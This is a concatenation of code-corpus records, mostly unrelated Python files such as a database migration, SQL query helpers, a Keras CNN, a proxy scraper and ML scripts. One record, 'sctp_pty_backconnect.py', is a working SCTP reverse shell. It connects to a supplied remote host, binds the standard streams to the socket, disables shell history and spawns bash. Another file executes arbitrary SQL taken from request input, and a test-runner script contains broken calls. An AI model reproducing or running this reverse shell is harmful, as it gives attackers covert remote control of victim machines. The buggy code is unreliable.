print(datetime.datetime.now())\n if all(os.path.isfile(segment) for segment in segments):\n try:\n sub_models = list(LA_DB_Model.read_pickle(segment) for segment in segments)\n loading = False\n print(\"Segments all loaded...\")\n except:\n pass\n else:\n time.sleep(10)\n\n for sub_model in sub_models:\n model.value_function_j.update(sub_model.value_function_j)\n model.value_function_v.update(sub_model.value_function_v)\n model.order_la_cache.update(sub_model.order_la_cache)\n model.reward_funcion_g_cache.update(sub_model.reward_funcion_g_cache)\n model.demand_rv_cache.update(sub_model.demand_rv_cache)\n model.base_stock_la_cache.update(sub_model.base_stock_la_cache)\n\n prefix_t = prefix + \"_t_{}\".format(t)\n print(\"Writing model: \", prefix_t)\n model.to_pickle(outdir + '/' + prefix_t)\n model.to_pickle(fn)\n","sub_path":"batch_multiprocess/run_db_exact_combine.py","file_name":"run_db_exact_combine.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356098002","text":"\"\"\"ntfy_templates\n\nRevision ID: dfa594f9dfba\nRevises: c544a5ebb328\nCreate Date: 2016-06-07 11:14:00.708443\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dfa594f9dfba'\ndown_revision = 'c544a5ebb328'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_template',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.Unicode(), nullable=False),\n sa.Column('subject', sa.Unicode(), nullable=True),\n sa.Column('body', sa.UnicodeText(), nullable=True),\n sa.Column('is_html', sa.Boolean(), server_default='true', nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_template')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/dfa594f9dfba_ntfy_templates.py","file_name":"dfa594f9dfba_ntfy_templates.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"26214354","text":"from sqlalchemy import create_engine\nfrom sqlalchemy import sql\nimport json\nfrom config import database_uri\n\nengine = create_engine(database_uri)\n\n# drinkers page\ndef get_drinkers(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select * from (select * \\\n\t\t from bills b where b.drinkerID=(select drinkerID \\\n\t\t from drinker where drinkerID= :id) \\\n order by billDate, billTime)as x group by x.barID;')\n rs = con.execute(query, id=drinker_id)\n return [dict(row) for row in rs]\n\ndef get_drinkers_list():\n with engine.connect() as con:\n rs = con.execute('SELECT drinkerID,name,lastname FROM drinker;')\n return [dict(r) for r in rs]\n\ndef get_bills():\n with engine.connect() as con:\n rs = con.execute('SELECT * FROM bills;')\n return [dict(r) for r in rs]\n\ndef get_drinker_orders(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select y.item_name, count(y.item_name) AS Count from (select * \\\n\t from (select t.item_name from transactions t where t.billID IN(select b.billID \\\n\t\t\tfrom bills b where b.drinkerID=(select drinkerID \\\n\t\t\tfrom drinker where drinkerID= :id))) x where x.item_name IN (select * \\\n\t\t\tfrom beers)) y group by y.item_name;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\n\ndef get_drinker_datespending(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select bars.name, sum(total)total, billTime, billDate \\\n from bills join bars on bars.barID = bills.barID \\\n where drinkerID=(select drinkerID from drinker where drinkerID=:id) \\\n group by bills.barID;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\n\ndef get_drinker_weekspending(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select br.name as BarName, w.total, count(week(w.billDate)) BillsInWeek, week(billDate) WeekNumberInYear , w.billTime \\\n from bars br, (select z.barID, sum(z.price) as total, z.billDate, z.billTime \\\n from (select s.*, x.billDate, x.billTime \\\n from sells s \\\n INNER JOIN (select t.*,b.barID, b.billDate, b.billTime from transactions t, bills b where t.billID IN (select billID from bills b where b.drinkerID=(select drinkerID from drinker where drinkerID=:id)) AND t.billID=b.billID) AS x on s.barID=x.barID AND s.itemID=x.item_name) as z group by barID) as w \\\n where w.barID=br.barID \\\n group by WeekNumberInYear \\\n order by BillsInWeek DESC;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\ndef get_drinker_monthspending(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select br.name as BarName, w.total, count(month(w.billDate)) BillsInMonth, month(billDate) MonthNumberInYear , w.billTime \\\n from bars br, (select z.barID, sum(z.price) as total, z.billDate, z.billTime \\\n from (select s.*, x.billDate, x.billTime from sells s \\\n INNER JOIN (select t.*,b.barID, b.billDate, b.billTime from transactions t, bills b where t.billID IN (select billID from bills b where b.drinkerID=(select drinkerID from drinker where drinkerID=1)) AND t.billID=b.billID) AS x on s.barID=x.barID AND s.itemID=x.item_name) as z group by barID) as w \\\n where w.barID=br.barID \\\n group by MonthNumberInYear \\\n order by BillsInMonth DESC;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\n\n# beer page\ndef get_beers_list():\n with engine.connect() as con:\n rs = con.execute('SELECT * FROM beers;')\n return [dict(r) for r in rs]\n\ndef get_beers_sells(beer_name):\n with engine.connect() as con:\n query = sql.text(\n 'select br.name, x.count \\\n from bars br,(select barID,count(barID)as count \\\n from bills where billID IN ( select billID from transactions where item_name=:name) \\\n group by barID \\\n order by count DESC)x \\\n where x.barID=br.barID \\\n LIMIT 12;')\n rs = con.execute(query, name=beer_name)\n return [dict(r) for r in rs]\n\ndef get_beers_consumers(beer_name):\n with engine.connect() as con:\n query = sql.text(\n 'select dr.name, x.count \\\n from drinker dr,(select drinkerID,count(drinkerID)as count \\\n from bills where billID IN ( select billID from transactions where item_name=:name) \\\n group by drinkerID order by count desc)x \\\n where x.drinkerID=dr.drinkerID \\\n LIMIT 10;')\n rs = con.execute(query, name=beer_name)\n return [dict(r) for r in rs]\n\ndef get_beers_tsellmost(beer_name):\n with engine.connect() as con:\n query = sql.text(\n 'select bars.name, bills.billDate, bills.billTime, count(billDate) as count \\\n from bills join bars on bars.barID = bills.barID \\\n where billID IN ( select billID from transactions where item_name=:name) \\\n group by billDate \\\n order by count DESC LIMIT 10;')\n rs = con.execute(query, name=beer_name)\n return [dict(r) for r in rs]\n\n# bar page\ndef get_bars():\n with engine.connect() as con:\n rs = con.execute('SELECT barID,name,openingTime,closingTime FROM bars;')\n return [dict(r) for r in rs]\n\ndef get_bar_spending(bar_id):\n with engine.connect() as con:\n query = sql.text(\n 'select drinker.name, sum(x.total) as Spending \\\n from (select * from bills where barID=:id) as x \\\n join drinker on drinker.drinkerID = x.drinkerID \\\n group by x.drinkerID order by sum(x.total) DESC LIMIT 15;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_popular_beer(bar_id):\n with engine.connect() as con:\n query = sql.text(\n 'select x.item_name as name, count(x.item_name) as count \\\n from (select item_name from transactions \\\n where billID IN(select billID from bills where barID=:id)) as x \\\n where x.item_name IN (select name from beers) \\\n group by x.item_name order by count(x.item_name) DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_manf_sell(bar_id):\n with engine.connect() as con:\n query = sql.text(\n 'select m.manufacturer, count(m.manufacturer) as count \\\n from(select x.item_name from (select item_name from transactions \\\n where billID IN(select billID from bills where barID=:id)) as x \\\n where x.item_name IN (select name from beers))y, items m \\\n where y.item_name=m.name \\\n group by m.manufacturer \\\n order by count(m.manufacturer) DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_busy_day(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' select billTime,billDate,total,count(billTime)as counts \\\n from bills \\\n where barID=(select barID from bars where barID=:id) \\\n group by hour(billTime) \\\n order by counts DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_busy_week(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' select Y.hour, max(Y.count) AS count, Y.week \\\n from (select bl.barID,hour(bl.billTIme) hour, count(hour(bl.billTime)) count,x.week as week \\\n from bills bl, (select week(billDate) as week from bills group by week order by week ASC)x \\\n where week(bl.billdate)=x.week AND bl.barID=(select barID from bars where barID=:id) \\\n group by hour(bl.billTime), x.week order by x.week, hour(bl.billTime) DESC)Y group by Y.week \\\n LIMIT 10;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\n# items\ndef get_item_price(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' SELECT name, sells.price \\\n FROM items \\\n JOIN sells \\\n ON sells.itemID = items.name && sells.barID=:id;')\n\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\n#insert transaction\ndef insert_transactions(bigData):\n try:\n with engine.connect() as con:\n y = getExistingBill(bigData)\n if len(y) > 0 : \n update =sql.text(\n 'UPDATE bills \\\n SET tip=:t, total=:to \\\n WHERE billID=:bilID;')\n con.execute(update, t= float(y[0][3]) + float(bigData['tip']),to=float(y[0][4]) + float(bigData['total']),bilID=int(y[0][0]))\n updateTransaction(int(y[0][0]), bigData['item_name'])\n else:\n query = sql.text(\n 'INSERT INTO bills (billTime,billDate,tip,total,drinkerID,barID) \\\n VALUES (:bT,:bD,:ti,:to,:dID,:bID);')\n con.execute(query, bT=bigData['billTime'],bD=bigData['billDate'],ti=bigData['tip'],to=bigData['total'],dID=bigData['drinkerID'],bID=bigData['barID'])\n z = getExistingBill(bigData)\n print('billId', z)\n updateTransaction(int(z[0][0]), bigData['item_name'])\n return [{\"success\": True}]\n\n except Exception as e:\n return [{\"success\": False, \"error\": e}]\n\n#update transaction\ndef updateTransaction(billId, itemName):\n print(billId, itemName)\n with engine.connect() as con:\n itrans = sql.text(\n 'INSERT INTO transactions (billID, item_name) \\\n VALUES (:bID,:i_name);')\n\n con.execute(itrans, bID=billId, i_name=itemName)\n\n#get existing bill row\ndef getExistingBill(bigData):\n with engine.connect() as con:\n check = sql.text(\n 'SELECT billID, billTime, billDate,tip, total, drinkerID, barID \\\n FROM bills \\\n WHERE (drinkerID=:dID && billDate=:bD && billTime=:bT && barID=:bID);')\n rc = con.execute(check, dID=bigData['drinkerID'],bD=bigData['billDate'],bT=bigData['billTime'],bID=bigData['barID'])\n return list(rc)\n\n#queries\ndef modify_queries(queryObj):\n try:\n with engine.connect() as con:\n con.execute(queryObj['query'])\n except Exception as e:\n return [{\"success\": False, \"error\": e}]\n return [{\"success\": True}]\n\n","sub_path":"firstweb/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426897523","text":"# 892. 三维形体的表面积\r\nimport numpy\r\n\r\n\r\nclass Solution:\r\n def surfaceArea(self, grid: list) -> int:\r\n\r\n N = len(grid)\r\n\r\n def S(L):\r\n Sum = 0\r\n for i in L:\r\n Last = 0\r\n for j in i:\r\n Sum += abs(j-Last)\r\n Last = j\r\n Sum += Last\r\n return Sum\r\n print(S(numpy.array(grid).T)+S(grid)+numpy.sign(grid).sum()*2)\r\n return S(numpy.array(grid).T)+S(grid)+numpy.sign(grid).sum()*2\r\n\r\n\r\ntest = Solution()\r\ntest.surfaceArea([[1, 2], [3, 4]])\r\n\r\n# 亦可通过在Edit Configuration中改变Execution中的Run with Python Console测试\r\n\r\n# 样例1,输入[[1,2],[3,4]],34\r\n# 这里的1意思是第一行第一列有一个立方体,2意思是第一行第二列有2个立方体,\r\n# 3的意思是第二行第一列有3个立方体,4意思是第二行第二列有4个立方体。\r\n# 样例2,输入:[[1,1,1],[1,0,1],[1,1,1]] 输出:32\r\n# 三行三列方格\r\n\r\n\r\n# 派n个小人,横向走一遍,纵向走一遍,小人上下台阶都费力,把费力值求和,加上数组中>0的个数*2就是答案\r\n# 每个小人从平地开始,到平地。\r\n# 在走台阶的时候,只需要记录上一次的台阶和本次台阶的差值绝对值,就是费力值。\r\n# 横向走一遍,纵向走一遍,即只需要再次调用函数,传入numpy的转置即可\r\n","sub_path":"20200323_leetcode_892.py","file_name":"20200323_leetcode_892.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164004095","text":"#!/usr/bin/python\n#coding:utf-8\n'''执行用例,生成Excel测试报告和发送邮件'''\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom testcase import Testcase\nfrom utils import Excel,datatodict,mkdir,suite_format\nfrom log import logger\nfrom data import testsuitetodata\nfrom email.mime.application import MIMEApplication\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom Junit import Junit\nimport threading\n\nclass Autotest():\n def __init__(self,params):\n self.params = params\n self.file_testcase = str(Path('testcase')/('testcase.xlsx'))\n self.excel_testcase = Excel('r', self.file_testcase)\n self.data = self.excel_testcase\n self.data = datatodict(self.data)\n self.testsuite = suite_format(self.data)\n self.result_testuite = []\n self.report_data={}\n report_file = str(Path('report')/('api' + '-' + 'report' + '' +'.xlsx'))\n self.report_workbook = Excel('w', report_file)\n self.junit_report = str(Path('junit')/('api' + '-' + 'junit' + '' + '.xml'))\n self.report = str(Path('report') / ('api-report.xlsx'))\n self.send_user = '1'\n self.password = ''\n self.receiver_users = '@'\n self.subject = 'python_report'\n self.email_text = 'hi good morning'\n self.server_address = 'smtp.email.qq.com'\n self.mail_type = '1'\n self.start_se_time = datetime.now()\n self.junit = Junit(self.start_se_time)\n self.step_fail = 0\n self.step_error = 0\n self.start = datetime.now()\n files = ('report','junit','config')\n for file in files:\n mkdir(file)\n\n txt_path = str(Path('config') / ('txt_final.txt'))\n txt = open(txt_path, 'w')\n txt.seek(0)\n txt.truncate()\n txt.close()\n\n def play(self):\n for testcase01 in self.testsuite:\n if testcase['condition'] == 'skip':\n for skipcase in testcase01['step']:\n logger.info(skipcase)\n skipcase['score'] = 'skip'\n self.result_testsuite.append(testcase01)\n continue\n rcase = Testcase(testcase01, self.junit)\n self.junit.case(testcase01['id'], testcase01['title'], datetime.now())\n thread = threading.Thread(target=self.result_testuite.append(rcase.run()), name = testcase01['title'])\n thread.start()\n self.junit.write_toxnl()\n\n def createport(self):\n data = testsuitetodata(self.result_testuite)\n self.report_workbook.write(data, 'repost_data')\n self.report_workbook.close()\n\n def sendemail(self):\n msg = MIMEMultipart()\n msg['Subject'] = self.subject\n msg['From'] = self.send_user\n msg['To'] = self.receiver_users\n\n part_text = MIMEText(self.email_text)\n msg.attach(part_text)\n\n part_attach1 = MIMEApplication(open(self.report, 'rb').readExcel())\n part_attach1.add_header('Content-Disposition', 'attachment', filename = '1911api-report.xlsx')\n msg.attach(part_attach1)\n smtp = smtplib.SMTP(self.server_address, 25)\n smtp.login(self.send_user, self.password)\n smtp.sendemail(self.send_user, self.receiver_users, msg.as_string())\n logger.info('Success!')\n","sub_path":"mytestcase/control/autotest.py","file_name":"autotest.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"498958552","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\nimport pymongo\nfrom multiprocessing import Pool\n\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"ippool\"]\nmycol = mydb[\"sixsixip\"]\n\nUseragent = UserAgent()\nheaders = {\n 'User-Agent':Useragent.random,\n}\n\ndef iptest(ipadd,port):\n url = 'https://www.baidu.com/'\n try:\n response = requests.get(url,headers=headers,proxies={ \"https\": \"http://{}:{}\".format(ipadd,port)},timeout = 10 )# 使用代理\n # print(response.status_code)\n if response.status_code == 200:\n print(\"有效代理\",ipadd,port)\n mycol.update({\"ipadd\":ipadd ,\"port\":port},{'$setOnInsert': {\"ipadd\":ipadd ,\"port\":port}},upsert=True)\n #有则存,没有则跳过\n except:\n print(\"失败\")\n\ndef scrapy(url):\n results = requests.get(url,headers=headers)\n results.encoding = results.apparent_encoding#获取网页编码,对网页内容进行编码,防止乱码产生\n soup = BeautifulSoup(results.text,features=\"lxml\")#配合BeautifulSoup获取标签内容\n ip_list = soup.find_all('table')[2].find_all('tr')\n for ip in ip_list:\n List = ip.find_all('td')\n iptest(List[0].string,List[1].string)\n\ndef mian():\n pool = Pool()#创建进程池\n pool.map(scrapy,['http://www.66ip.cn/{}.html'.format(i) for i in range(1,20)])\n pool.close() # 将进程池关闭,不再接受新的进程\n pool.join() # 主进程阻塞,只有池中所有进程都完毕了才会通过\n\n# if __name__ == \"__main__\":\n# main()\n","sub_path":"ippool/ipspider.py","file_name":"ipspider.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"632234350","text":"#!/usr/bin/python2\n\"\"\"\nReverse Connect SCTP PTY Shell - testing version\ninfodox - insecurety.net (2013)\n\nFor an excellent listener use the following socat command:\nsocat file:`tty`,echo=0,raw sctp-listen:PORT\n\nAlternatively, use sctp_pty_shell_handler.py \n\"\"\"\nimport os\nimport pty\nimport sys\nimport socket\nfrom sctp import *\n\ndef main():\n if len(sys.argv) < 3:\n print(\"Usage:\\n \" + sys.argv[0] + \" \\n\")\n exit(1)\n\n rhost = str(sys.argv[1])\n rport = int(sys.argv[2])\n s = sctpsocket_tcp(socket.AF_INET)\n s.connect((rhost, rport))\n os.dup2(s.fileno(),0)\n os.dup2(s.fileno(),1)\n os.dup2(s.fileno(),2)\n os.putenv(\"HISTFILE\",'/dev/null')\n pty.spawn(\"/bin/bash\")\n s.close()\n\t\nif __name__ == \"__main__\":\n main()\n","sub_path":"sctp_pty_backconnect.py","file_name":"sctp_pty_backconnect.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488186148","text":"\"\"\"este programa pedira un año al usuario y este si el año es\nposterior a 1990 le dira si es bisiesto, si no no se lo dira\"\"\"\n\nfrom bisiesto import esBisiesto\n\nanno=int(input(\"introduce un año\"))\nif anno>=1990:\n if esBisiesto(anno):\n print(\"tu año es bisiesto\")\n else:\n print(\"tu año no es bisiesto\")\nelse:\n print(\"introduce un valor valido, este programa solo dice si es bisiesto un año mayor a 1990\")\n\n","sub_path":"2019-uni/año_tal_bisiesto.py","file_name":"año_tal_bisiesto.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417974935","text":"import pickle\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\n\nnp.random.seed(2016) # for reproducibility\n\n\noutput = open('dataset.txt', 'rb')\ndata = pickle.load(output, )\n\nX_train = np.array(data['X_train'])\nX_test = np.array(data['X_test'])\ny_train = np.array(data['y_train'])\ny_test = np.array(data['y_test'])\n\nbatch_size = 64\nnb_classes = 2\nnb_epoch = 12\n\n# input image dimensions\nimg_rows, img_cols = 64, 64\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\npool_size = (2, 2)\n# convolution kernel size\nkernel_size = (3, 3)\n\nX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\nX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\n\n# Set up the CNN using Keras\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],\n border_mode='valid',\n input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=pool_size))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adadelta',\n metrics=['accuracy'])\n\nmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,\n verbose=1, validation_data=(X_test, Y_test))\nscore = model.evaluate(X_test, Y_test, verbose=1)\n\nmodel.save_weights('cell_cnn_trained_weights')\n# \nprint('Test accuracy:', score[1])","sub_path":"deep_learning/cnn_cell_cycle_detection/cell_cnn.py","file_name":"cell_cnn.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"310541838","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.4/dist-packages/fuzzylib/fis.py\n# Compiled at: 2015-09-29 17:24:14\n# Size of source mod 2**32: 1779 bytes\nimport math\n\nclass FIS:\n\n def __init__(self):\n self._rules = {}\n self._variables = {}\n\n def add_rule(self, rule):\n outvar = rule.get_consequent()[0]\n if outvar not in self._rules:\n self._rules[outvar] = []\n self._rules[outvar].append(rule)\n\n def add_variable(self, var):\n self._variables[var.get_name()] = var\n\n def _process_output(self, rules, vars_values):\n outvar = self._variables[rules[0].get_consequent()[0]]\n center_num = 0\n center_den = 0\n xmin, xmax = outvar.get_range()\n x = xmin\n xstep = (xmax - xmin) / 1000\n while x < xmax:\n activation = []\n for r in rules:\n for var in vars_values:\n r.set_value(var, vars_values[var])\n\n ant = r.eval_antecedent()\n function = r.get_consequent()[1]\n activation.append(min(ant, function(x)))\n\n fx = max(activation)\n center_num += x * fx\n center_den += fx\n x += xstep\n\n try:\n value = center_num / center_den\n except ZeroDivisionError:\n value = float('inf')\n\n return value\n\n def defuzzy(self, vars_values):\n outputs = {}\n for o in self._rules:\n outputs[o] = self._process_output(self._rules[o], vars_values)\n\n return outputs","sub_path":"pycfiles/fuzzylib-0.1.1.linux-x86_64.tar/fis.cpython-34.py","file_name":"fis.cpython-34.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57248539","text":"# -*- coding: utf-8 -*-\nimport csv\nimport random\n\nfrom helpers import tokenize\nfrom helpers import preprocess\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\n# Gets the training data from the file\ntrain_data_labels = []\ntrain_data = []\nwith open(\"resources/train.tsv\") as file:\n tsvreader = csv.reader(file, delimiter=\"\\t\")\n for line in tsvreader:\n train_data_labels.append(line[0])\n train_data.append(line[1])\n\n# Gets the testing data from the file\ntest_data_labels = []\ntest_data = []\nwith open(\"resources/dev.tsv\") as file:\n tsvreader = csv.reader(file, delimiter=\"\\t\")\n for line in tsvreader:\n test_data_labels.append(line[0])\n test_data.append(line[1])\n\n# Maps features to numerical vectors\nvec_train = CountVectorizer(preprocessor=lambda x: preprocess(x),\n tokenizer=lambda x: tokenize(x))\ntrain_data_vectorized = vec_train.fit_transform(train_data)\n\nvec_test = CountVectorizer(preprocessor=lambda x: preprocess(x),\n tokenizer=lambda x: tokenize(x),\n vocabulary=vec_train.vocabulary_)\ntest_data_vectorized = vec_test.fit_transform(test_data)\n\n# # Tunes parameters\n# param_grid = {\n# 'penalty': ['l2', 'l1'],\n# 'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000],\n# 'fit_intercept': [True, False],\n# 'class_weight': [None, 'balanced'],\n# }\n# clf = GridSearchCV(LogisticRegression(), param_grid)\n# clf.fit(train_data_vectorized, train_data_labels)\n# print(clf.best_params_)\n\n\n# Trains logistic regression model\nlog_reg = LogisticRegression(penalty='l1', C=1.0, class_weight='balanced')\nlog_reg = log_reg.fit(X=train_data_vectorized, y=train_data_labels)\n\n# Tests logistic regression model accuracy\nlog_reg_pred = log_reg.predict(test_data_vectorized)\nprint(\"Logistic regression model accuracy: {}\".format(accuracy_score(log_reg_pred, test_data_labels)))\n\n# Prints confusion matrix\nprint(confusion_matrix(test_data_labels, log_reg_pred, labels=['positive', 'neutral', 'negative']))\n\n# # Prints a random sample of testing data with their label\n# j = random.randint(0, len(test_data) - 5)\n# for i in range(j, j + 5):\n# print(test_data[i])\n# print(log_reg_pred[i])\n\n# # Trains SVC\n# svc = SVC()\n# svc = svc.fit(X=train_data_vectorized, y=train_data_labels)\n#\n# # Tests SVC model accuracy\n# svc_pred = svc.predict(test_data_vectorized)\n# print(\"SVC model accuracy: {}\".format(accuracy_score(svc_pred, test_data_labels)))\n#\n#\n# # Trains Multinomial Naive Bayes\n# mn_bayes = MultinomialNB()\n# mn_bayes = mn_bayes.fit(X=train_data_vectorized, y=train_data_labels)\n#\n# # Tests Multinomial Naive Bayes\n# mn_bayes_pred = mn_bayes.predict(test_data_vectorized)\n# print(\"Multinomial Naive Bayes model accuracy: {}\".format(accuracy_score(mn_bayes_pred, test_data_labels)))\n\n","sub_path":"assignment-1/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621710186","text":"from django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404\n\nfrom common.pagination import get_page\nfrom ..models import Item, ItemAttachment, ITEM_SECTIONS, ITEM_SCHOOL_CLASSES\n\n\ndef index(request, section):\n school_class = request.GET.get('school_class')\n\n q = Q(section=section, published=True)\n if school_class:\n q &= Q(school_class=int(school_class))\n items_page = get_page(request, Item.objects.filter(q).order_by('-created'))\n current_section = filter(lambda x: x[0] == section, ITEM_SECTIONS)[0]\n return render(request, 'recommended_reading/frontend/index.html', {\n 'items_page': items_page,\n 'current_section': current_section,\n 'school_classes': ITEM_SCHOOL_CLASSES\n })\n\n\ndef detail(request, id):\n item = get_object_or_404(Item, id=id)\n attachments = ItemAttachment.objects.filter(item=item)\n return render(request, 'recommended_reading/frontend/detail.html', {\n 'item': item,\n 'attachments': attachments,\n })\n\n","sub_path":"libcms/apps/recommended_reading/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558734792","text":"from statistics import mean\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport pandas as pd\nimport csv\n\n\n\n\nstyle.use('fivethirtyeight')\ndatapath=\"\" #specify the data path\ndef get_path(path):\n f=open(path,'r')\n reader=csv.reader(f)\n header=next(reader)\n data=[]\n for line in reader:\n data.append([float(x) for x in line])\n return header , np.transpose(data)\nheader , data = get_path(datapath)\nxs =np.array(data[0],dtype=np.float64)\nys= np.array(data[1],dtype=np.float64)\nprint(len(xs),len(ys))\n\ndef best_fit_slope_and_intercept(xs,ys):\n m=(((mean(xs) * mean(ys))-mean(xs*ys))/((mean(xs)*mean(xs))-mean(xs*xs)))\n b=mean(ys) - m*mean(xs)\n return m,b\n\ndef squared_error(ys_orig , ys_line):\n return sum((ys_line-ys_orig)**2)\n\ndef coefficient_of_determination(ys_orig,ys_line):\n y_mean_line = [mean(ys_orig) for y in ys_orig]\n squared_error_regr = squared_error(ys_orig , ys_line)\n squared_error_y_mean = squared_error(ys_orig,y_mean_line)\n return 1-(squared_error_regr / squared_error_y_mean)\n\nm , b = best_fit_slope_and_intercept(xs,ys)\n\nregression_line = [(m*x)+b for x in xs]\n\nr_squared = coefficient_of_determination(ys,regression_line)\nprint(r_squared)\n\n\nplt.scatter(xs,ys)\nplt.plot(xs,regression_line)\nplt.show()\n","sub_path":"UnivariateRegression.py","file_name":"UnivariateRegression.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"408359346","text":"#!/usr/bin/python\r\nimport numpy as np\r\nimport cv2\r\nimport pandas as pd\r\nimport mysql.connector\r\nimport sys\r\nimport csv\r\nimport os\r\nfrom pandas import read_csv\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport openpyxl\r\nfrom PIL import Image;\r\n\r\n\r\ndb=mysql.connector.connect(host='localhost',user='root',passwd='',db='student' )\r\ncur=db.cursor()\r\n\r\n\r\n#just create a column in the csv file\r\ndef mark():\r\n mtext=ment.get()\r\n wb = openpyxl.load_workbook('attendance.xlsx')\r\n sheet = wb['Sheet1']\r\n columns = sheet.max_column+1\r\n sheet.insert_cols(columns,1)\r\n sheet.cell(row=1, column=columns).value =mtext\r\n wb.save(\"C:/xampp1/htdocs/facedetect/attendance.xlsx\")\r\n\r\n#detecting faces and marking attendance\r\ndef open_file():\r\n result= filedialog.askopenfile(initialdir = \"/xampp1/htdocs/facedetect\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n filename = os.path.abspath(result.name)\r\n\r\n face_cascade = 